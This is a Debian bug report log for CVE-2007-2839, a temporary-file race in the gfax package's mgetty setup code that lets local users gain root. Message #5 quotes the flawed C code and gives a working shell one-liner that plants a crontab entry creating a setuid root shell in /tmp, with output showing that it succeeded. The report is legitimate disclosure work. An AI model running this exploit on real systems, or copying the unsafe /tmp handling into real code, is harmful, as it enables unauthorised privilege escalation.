Debian Bug report logs -
#431893
CVE-2007-2839: Trivial local-root attack
Reported by: Steve Kemp <skx@debian.org>
Date: Thu, 5 Jul 2007 19:49:32 UTC
Severity: grave
Tags: security
Found in version gfax/0.4.2-11
Done: Steve Kemp <skx@debian.org>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded to debian-bugs-dist@lists.debian.org, Mirco Bauer <meebey@debian.org>:
Bug#431893; Package gfax.
(full text, mbox, link).
Acknowledgement sent to Steve Kemp <skx@debian.org>:
New Bug report received and forwarded. Copy sent to Mirco Bauer <meebey@debian.org>.
(full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: gfax
Version: 0.4.2-11
Severity: grave
Usertags: sourcescan
Tags: security
*** Please type your report below this line ***
The gfax package as released in Sarge, make unsafe use of temporary files
which allow local users to gain root trivially.
Etch, Lenny, and Sid are unaffected.
The following code is in src/mgetty_setup.c:
/* if it's NULL then nuke the faxrunq crontab entry. */
if ((fin = fopen("/etc/crontab", "r")) == NULL) {
do_message(_("\nCan't open /etc/crontab\n"));
return;
}
if ((fout = fopen("/tmp/crontab", "w")) == NULL) {
do_message(_("\nCan't create /tmp/crontab\n"));
return;
}
while (fgets(buf, 128, fin) != NULL) {
fputs(buf, fout);
fclose(fout);
fclose(fin);
/* now copy the new file back to /etc */
if ((fin = fopen("/tmp/crontab", "r")) == NULL) {
do_message(_("\nCan't open /tmp/crontab\n"));
return;
}
if ((fout = fopen("/etc/crontab", "w")) == NULL) {
do_message(_("\nCan't create /etc/crontab\n"));
return;
}
while ((c = fgetc(fin)) != EOF)
fputc(c, fout);
fclose(fout);
fclose(fin);
remove("/tmp/crontab");
This can be abused to write arbitary commands to the /etc/crontab file.
If /tmp/crontab exists already, owned by a non-root user then it will
be truncated and trashed. However the ownership will still remain that
of the non-root user - so a race condition between the first copy
and the second copy can allow arbitary line(s) to be appended to /etc/crontab.
The following exploits this easily:
skx@vain:~$ while true; do echo "*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh" > /tmp/crontab; done
When root runs the setup program things end up like this:
skx@vain:~$ ls -l /etc/crontab
-rw-r--r-- 1 root root 60 2007-07-02 20:27 /etc/crontab
skx@vain:~$ cat /etc/crontab
*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh
skx@vain:~$ ls -l /tmp/sh
-rwsr-xr-x 1 root root 769368 2007-07-02 20:28 /tmp/sh
Steve
--
http://www.steve.org.uk/
Information forwarded to debian-bugs-dist@lists.debian.org, Mirco Bauer <meebey@debian.org>:
Bug#431893; Package gfax.
(full text, mbox, link).
Acknowledgement sent to Steve Kemp <skx@debian.org>:
Extra info received and forwarded to list. Copy sent to Mirco Bauer <meebey@debian.org>.
(full text, mbox, link).
Message #10 received at 431893@bugs.debian.org (full text, mbox, reply):
This is fixed in DSA-1329-1. Just reported here for reference.
Steve
--
Reply sent to Steve Kemp <skx@debian.org>:
You have taken responsibility.
(full text, mbox, link).
Notification sent to Steve Kemp <skx@debian.org>:
Bug acknowledged by developer.
(full text, mbox, link).
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Fri, 03 Aug 2007 07:45:40 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Sun Mar 1 12:23:54 2020;
Machine Name:
beach
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.